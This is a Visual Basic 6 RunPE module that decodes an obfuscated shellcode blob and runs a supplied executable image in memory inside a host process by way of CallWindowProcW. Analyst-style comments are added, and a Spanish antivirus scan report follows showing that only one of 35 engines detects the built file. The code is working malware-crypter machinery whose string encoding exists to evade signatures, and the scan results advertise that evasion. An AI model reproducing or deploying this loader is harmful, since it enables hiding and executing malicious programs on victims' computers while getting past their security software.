
mshRunPe Mod vb6


Option Explicit

'---------------------------------------------------------------------------------------
' Module : mshRunPE_Strings
' Author : iCodeInVB6
' Now : 05/16/2012 11:40
' Purpose : Run executable in memory
' Only uses CallWindowProc & shellcode
' Credits : hamavb <-- made the shellcode!
' Tested : Win7 x64
' Mod by : Himanen
'---------------------------------------------------------------------------------------

'USER32
' The only imported API. It is not used to forward window messages: RunPE hands it
' the address of a byte array as lpPrevWndFunc, so the call transfers control into
' that buffer (an indirect-call / shellcode-trampoline pattern worth flagging in review).
Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long

' s_ASM: 8 strings holding the code in a token-obfuscated form (see RunPE for the decoder).
' b_ASM: the 1288 decoded bytes (0 To 1287) that CallWindowProcW is pointed at.
Private s_ASM(7) As String
Private b_ASM(1287) As Byte

'---------------------------------------------------------------------------------------
' RunPE: decodes the obfuscated strings in s_ASM into the byte array b_ASM, then
' transfers execution to that buffer by passing VarPtr(b_ASM(0)) to CallWindowProcW
' as the "window procedure". The hWnd and Msg slots do not carry a window handle or
' message; they carry pointers to TargetHost and bBuffer, which the code in b_ASM
' reads as its arguments.
'
' TargetHost - host path string; passed by address via StrPtr(TargetHost).
' bBuffer - in-memory image; passed by address via VarPtr(bBuffer(0)). The array
' must already be allocated: indexing element 0 of an unallocated dynamic
' array raises run-time error 9 (Subscript out of range) before the call.
' Returns nothing; the CallWindowProcW return value is discarded, so any failure
' inside the buffer is silent to the caller.
'
' Analysis note: the string obfuscation is purely cosmetic (signature avoidance) and
' is reversed deterministically by the loop below, so the decoded b_ASM is the
' artefact to examine. A CallWindowProcW whose lpPrevWndFunc points into a VB
' byte array rather than a module's code is the observable indicator of this pattern.
'---------------------------------------------------------------------------------------
Public Sub RunPE(ByVal TargetHost As String, bBuffer() As Byte)
Dim i As Long ' index into s_ASM (0..7)
Dim j As Long ' character offset within the current string (1-based, step 5)
Dim k As Long ' running output index into b_ASM (0..1287)

' Each 5-character token "LM\XX" encodes one byte whose hex value is XX.
s_ASM(0) = "LM\60LM\E8LM\4ELM\00LM\00LM\00LM\6BLM\00LM\65LM\00LM\72LM\00LM\6ELM\00LM\65LM\00LM\6CLM\00LM\33LM\00LM\32LM\00LM\00LM\00LM\6ELM\00LM\74LM\00LM\64LM\00LM\6CLM\00LM\6CLM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\00LM\5BLM\8BLM\FCLM\6ALM\42LM\E8LM\BBLM\03LM\00LM\00LM\8BLM\54LM\24LM\28LM\89LM\11LM\8BLM\54LM\24LM\2CLM\6ALM\3ELM\E8LM\AALM\03LM\00LM\00LM\89LM\11LM\6ALM\4ALM\E8LM\A1LM\03LM\00LM\00LM\89LM\39LM\6ALM\1ELM\6ALM\3CLM\E8LM\9DLM\03LM\00LM\00LM\6ALM\22LM\68LM\F4LM\00LM\00LM\00LM\E8LM\91LM\03LM\00LM\00LM\6ALM\26LM\6ALM\24LM\E8LM\88LM\03LM\00LM\00LM\6ALM\2ALM\6ALM\40LM\E8LM\7FLM\03LM\00LM\00"
s_ASM(1) = "LM\6ALM\2ELM\6ALM\0CLM\E8LM\76LM\03LM\00LM\00LM\6ALM\32LM\68LM\C8LM\00LM\00LM\00LM\E8LM\6ALM\03LM\00LM\00LM\6ALM\2ALM\E8LM\5CLM\03LM\00LM\00LM\8BLM\09LM\C7LM\01LM\44LM\00LM\00LM\00LM\6ALM\12LM\E8LM\4DLM\03LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\79LM\03LM\00LM\00LM\6ALM\3ELM\E8LM\3BLM\03LM\00LM\00LM\8BLM\D1LM\6ALM\1ELM\E8LM\32LM\03LM\00LM\00LM\6ALM\40LM\FFLM\32LM\FFLM\31LM\FFLM\D0LM\6ALM\12LM\E8LM\23LM\03LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\4FLM\03LM\00LM\00LM\6ALM\1ELM\E8LM\11LM\03LM\00LM\00LM\8BLM\09LM\8BLM\51LM\3CLM\6ALM\3ELM\E8LM\05LM\03LM\00LM\00LM\8BLM\39LM\03LM\FALM\6ALM\22LM\E8LM\FALM\02LM\00LM\00LM\8BLM\09LM\68LM\F8LM\00LM\00LM\00LM\57LM\51LM\FFLM\D0LM\6ALM\00LM\E8LM\E8LM\02LM\00LM\00LM\68LM\88LM\FELM\B3LM\16LM\51LM\E8LM\14LM\03LM\00LM\00LM\6ALM\2ELM\E8LM\D6LM\02LM\00"
s_ASM(2) = "LM\00LM\8BLM\39LM\6ALM\2ALM\E8LM\CDLM\02LM\00LM\00LM\8BLM\11LM\6ALM\42LM\E8LM\C4LM\02LM\00LM\00LM\57LM\52LM\6ALM\00LM\6ALM\00LM\6ALM\04LM\6ALM\00LM\6ALM\00LM\6ALM\00LM\6ALM\00LM\FFLM\31LM\FFLM\D0LM\6ALM\12LM\E8LM\A9LM\02LM\00LM\00LM\68LM\D0LM\37LM\10LM\F2LM\51LM\E8LM\D5LM\02LM\00LM\00LM\6ALM\22LM\E8LM\97LM\02LM\00LM\00LM\8BLM\11LM\6ALM\2ELM\E8LM\8ELM\02LM\00LM\00LM\8BLM\09LM\FFLM\72LM\34LM\FFLM\31LM\FFLM\D0LM\6ALM\00LM\E8LM\7ELM\02LM\00LM\00LM\68LM\9CLM\95LM\1ALM\6ELM\51LM\E8LM\AALM\02LM\00LM\00LM\6ALM\22LM\E8LM\6CLM\02LM\00LM\00LM\8BLM\11LM\8BLM\39LM\6ALM\2ELM\E8LM\61LM\02LM\00LM\00LM\8BLM\09LM\6ALM\40LM\68LM\00LM\30LM\00LM\00LM\FFLM\72LM\50LM\FFLM\77LM\34LM\FFLM\31LM\FFLM\D0LM\6ALM\36LM\E8LM\47LM\02LM\00LM\00LM\8BLM\D1LM\6ALM\22LM\E8LM\3ELM\02LM\00LM\00LM\8BLM\39LM\6ALM\3ELM\E8LM\35LM\02LM\00"
s_ASM(3) = "LM\00LM\8BLM\31LM\6ALM\22LM\E8LM\2CLM\02LM\00LM\00LM\8BLM\01LM\6ALM\2ELM\E8LM\23LM\02LM\00LM\00LM\8BLM\09LM\52LM\FFLM\77LM\54LM\56LM\FFLM\70LM\34LM\FFLM\31LM\6ALM\00LM\E8LM\10LM\02LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\3CLM\02LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\12LM\E8LM\F9LM\01LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\25LM\02LM\00LM\00LM\6ALM\22LM\E8LM\E7LM\01LM\00LM\00LM\8BLM\11LM\83LM\C2LM\06LM\6ALM\3ALM\E8LM\DBLM\01LM\00LM\00LM\6ALM\02LM\52LM\51LM\FFLM\D0LM\6ALM\36LM\E8LM\CELM\01LM\00LM\00LM\C7LM\01LM\00LM\00LM\00LM\00LM\B8LM\28LM\00LM\00LM\00LM\6ALM\36LM\E8LM\BCLM\01LM\00LM\00LM\F7LM\21LM\6ALM\1ELM\E8LM\B3LM\01LM\00LM\00LM\8BLM\11LM\8BLM\52LM\3CLM\81LM\C2LM\F8LM\00LM\00LM\00LM\03LM\D0LM\6ALM\3ELM\E8LM\9FLM\01LM\00LM\00LM\03LM\11LM\6ALM\26LM\E8LM\96LM\01LM\00LM\00LM\6A"
s_ASM(4) = "LM\28LM\52LM\FFLM\31LM\6ALM\12LM\E8LM\8ALM\01LM\00LM\00LM\68LM\5BLM\E8LM\14LM\CFLM\51LM\E8LM\B6LM\01LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\26LM\E8LM\73LM\01LM\00LM\00LM\8BLM\39LM\8BLM\09LM\8BLM\71LM\14LM\6ALM\3ELM\E8LM\65LM\01LM\00LM\00LM\03LM\31LM\6ALM\26LM\E8LM\5CLM\01LM\00LM\00LM\8BLM\09LM\8BLM\51LM\0CLM\6ALM\22LM\E8LM\50LM\01LM\00LM\00LM\8BLM\09LM\03LM\51LM\34LM\6ALM\46LM\E8LM\44LM\01LM\00LM\00LM\8BLM\C1LM\6ALM\2ELM\E8LM\3BLM\01LM\00LM\00LM\8BLM\09LM\50LM\FFLM\77LM\10LM\56LM\52LM\FFLM\31LM\6ALM\00LM\E8LM\2ALM\01LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\56LM\01LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\36LM\E8LM\13LM\01LM\00LM\00LM\8BLM\11LM\83LM\C2LM\01LM\89LM\11LM\6ALM\3ALM\E8LM\05LM\01LM\00LM\00LM\8BLM\09LM\3BLM\CALM\0FLM\85LM\33LM\FFLM\FFLM\FFLM\6ALM\32LM\E8LM\F4LM\00LM\00LM\00"
s_ASM(5) = "LM\8BLM\09LM\C7LM\01LM\07LM\00LM\01LM\00LM\6ALM\00LM\E8LM\E5LM\00LM\00LM\00LM\68LM\D2LM\C7LM\A7LM\68LM\51LM\E8LM\11LM\01LM\00LM\00LM\6ALM\32LM\E8LM\D3LM\00LM\00LM\00LM\8BLM\11LM\6ALM\2ELM\E8LM\CALM\00LM\00LM\00LM\8BLM\09LM\52LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\22LM\E8LM\BBLM\00LM\00LM\00LM\8BLM\39LM\83LM\C7LM\34LM\6ALM\32LM\E8LM\AFLM\00LM\00LM\00LM\8BLM\31LM\8BLM\B6LM\A4LM\00LM\00LM\00LM\83LM\C6LM\08LM\6ALM\2ELM\E8LM\9DLM\00LM\00LM\00LM\8BLM\11LM\6ALM\46LM\E8LM\94LM\00LM\00LM\00LM\51LM\6ALM\04LM\57LM\56LM\FFLM\32LM\6ALM\00LM\E8LM\86LM\00LM\00LM\00LM\68LM\A1LM\6ALM\3DLM\D8LM\51LM\E8LM\B2LM\00LM\00LM\00LM\83LM\C4LM\0CLM\FFLM\D0LM\6ALM\22LM\E8LM\6FLM\00LM\00LM\00LM\8BLM\09LM\8BLM\51LM\28LM\03LM\51LM\34LM\6ALM\32LM\E8LM\60LM\00LM\00LM\00LM\8BLM\09LM\81LM\C1LM\B0LM\00LM\00LM\00LM\89LM\11LM\6ALM\00LM\E8"
s_ASM(6) = "LM\4FLM\00LM\00LM\00LM\68LM\D3LM\C7LM\A7LM\E8LM\51LM\E8LM\7BLM\00LM\00LM\00LM\6ALM\32LM\E8LM\3DLM\00LM\00LM\00LM\8BLM\D1LM\6ALM\2ELM\E8LM\34LM\00LM\00LM\00LM\8BLM\09LM\FFLM\32LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\00LM\E8LM\24LM\00LM\00LM\00LM\68LM\88LM\3FLM\4ALM\9ELM\51LM\E8LM\50LM\00LM\00LM\00LM\6ALM\2ELM\E8LM\12LM\00LM\00LM\00LM\8BLM\09LM\FFLM\71LM\04LM\FFLM\D0LM\6ALM\4ALM\E8LM\04LM\00LM\00LM\00LM\8BLM\21LM\61LM\C3LM\8BLM\CBLM\03LM\4CLM\24LM\04LM\C3LM\6ALM\00LM\E8LM\F2LM\FFLM\FFLM\FFLM\68LM\54LM\CALM\AFLM\91LM\51LM\E8LM\1ELM\00LM\00LM\00LM\6ALM\40LM\68LM\00LM\10LM\00LM\00LM\FFLM\74LM\24LM\18LM\6ALM\00LM\FFLM\D0LM\FFLM\74LM\24LM\14LM\E8LM\CFLM\FFLM\FFLM\FFLM\89LM\01LM\83LM\C4LM\10LM\C3LM\E8LM\22LM\00LM\00LM\00LM\68LM\A4LM\4ELM\0ELM\ECLM\50LM\E8LM\4BLM\00LM\00LM\00LM\83LM\C4LM\08LM\FFLM\74LM\24LM\04"
s_ASM(7) = "LM\FFLM\D0LM\FFLM\74LM\24LM\08LM\50LM\E8LM\38LM\00LM\00LM\00LM\83LM\C4LM\08LM\C3LM\55LM\52LM\51LM\53LM\56LM\57LM\33LM\C0LM\64LM\8BLM\70LM\30LM\8BLM\76LM\0CLM\8BLM\76LM\1CLM\8BLM\6ELM\08LM\8BLM\7ELM\20LM\8BLM\36LM\38LM\47LM\18LM\75LM\F3LM\80LM\3FLM\6BLM\74LM\07LM\80LM\3FLM\4BLM\74LM\02LM\EBLM\E7LM\8BLM\C5LM\5FLM\5ELM\5BLM\59LM\5ALM\5DLM\C3LM\55LM\52LM\51LM\53LM\56LM\57LM\8BLM\6CLM\24LM\1CLM\85LM\EDLM\74LM\43LM\8BLM\45LM\3CLM\8BLM\54LM\28LM\78LM\03LM\D5LM\8BLM\4ALM\18LM\8BLM\5ALM\20LM\03LM\DDLM\E3LM\30LM\49LM\8BLM\34LM\8BLM\03LM\F5LM\33LM\FFLM\33LM\C0LM\FCLM\ACLM\84LM\C0LM\74LM\07LM\C1LM\CFLM\0DLM\03LM\F8LM\EBLM\F4LM\3BLM\7CLM\24LM\20LM\75LM\E1LM\8BLM\5ALM\24LM\03LM\DDLM\66LM\8BLM\0CLM\4BLM\8BLM\5ALM\1CLM\03LM\DDLM\8BLM\04LM\8BLM\03LM\C5LM\5FLM\5ELM\5BLM\59LM\5ALM\5DLM\C3LM\C3LM\00LM\00LM\00LM\00"

' Decode: 8 strings x 161 tokens (j = 1, 6, ..., 801) = 1288 bytes, exactly filling
' b_ASM(0 To 1287). Chr(38) & Chr(72) is "&H", so "LM\XX" becomes the VB hex literal
' "&HXX", which is coerced to a Byte on assignment. The loop relies on every string
' being at least 805 characters; a shorter string would yield "" tokens and a type error.
For i = 0 To 7
For j = 1 To 805 Step 5
b_ASM(k) = Replace(Mid(s_ASM(i), j, 5), "LM\", Chr(Val("38")) & Chr(Val("72"))): k = k + 1
Next j
Next i

' Control transfer: b_ASM is used as the "window procedure"; the hWnd and Msg
' parameters are repurposed to pass the host-path and payload pointers.
' The return value is not checked.
CallWindowProcW VarPtr(b_ASM(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0

End Sub

Tipo de reporte: Analizar Fichero
Fecha/Hora: 24/01/2013 12:17:19 UTC
Fichero: sin.exe
Tamaño: 32768 KB
MD5: 0952D1363A1E03F81166170962894CF6
Detecciones:[COLOR="#FF0000"]1/35
Estado: INFECTADO[/COLOR]

AVG Free: Limpio
ArcaVir: Limpio
Avast 5: Limpio
[COLOR="#FF0000"]AntiVir (Avira): TR/Dropper.Gen[/COLOR]
BitDefender: Limpio
VirusBuster Internet Security: Limpio
Clam Antivirus: Limpio
COMODO Internet Security: Limpio
Dr.Web: Limpio
eTrust-Vet: Limpio
F-PROT Antivirus: Limpio
F-Secure Internet Security: Limpio
G Data: Limpio
IKARUS Security: Limpio
Kaspersky Antivirus: Limpio
McAfee: Limpio
MS Security Essentials: Limpio
ESET NOD32: Limpio
Norman: Limpio
Norton Antivirus: Limpio
Panda Security: Limpio
A-Squared: Limpio
Quick Heal Antivirus: Limpio
Solo Antivirus: Limpio
Sophos: Limpio
Trend Micro Internet Security: Limpio
VBA32 Antivirus: Limpio
Vexira Antivirus: Limpio
Zoner AntiVirus: Limpio
Ad-Aware: Limpio
BullGuard: Limpio
Immunet Antivirus: Limpio
K7 Ultimate: Limpio
NANO Antivirus: Limpio
VIPRE: Limpio
